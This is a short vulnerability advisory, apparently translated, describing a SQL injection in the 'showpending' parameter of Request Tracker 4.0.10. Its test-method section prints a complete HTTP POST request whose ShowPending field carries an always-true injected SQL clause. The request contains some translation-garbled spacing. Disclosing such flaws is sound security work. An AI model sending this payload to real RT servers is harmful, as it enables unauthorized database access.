Request Tracker 'showpending' parameter SQL Injection Vulnerability

Request Tracker 'showpending' parameter SQL Injection Vulnerability

Release date:
Updated on: 2013-04-13

Affected Systems:
Bestpractical RT 4.0.10
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59022
 
Request Tracker is a problem tracking system for bug Tracking, customer service, workflow processing, change management, network operations, and youth tutoring.
 
RT 4.0.10 is vulnerable to SQL injection attacks. After successful exploitation, attackers can perform unauthorized database operations.
 
<* Source: cheki
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POST/Approvals/HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80 = 7c120854a0%239b%557f024cc1cb
Accept-Language: en-US
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2;. net clr 2.0.50727;. net clr 3.5.30729;. NET CLR
3.0.30729; Media Center PC 6.0;. NET4.0C;. NET4.0E)
Content-Length: 120
 
ShowPending = 1% 27 + and + % 27f % 27% 3D % 27f % 27% 29 + -- + & ShowResolved = 1 & ShowRejected = 1 & ShowDependent = 1 & CreatedBefore = & CreatedAfter =

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Bestpractical
-------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.bestpractical.com/rt/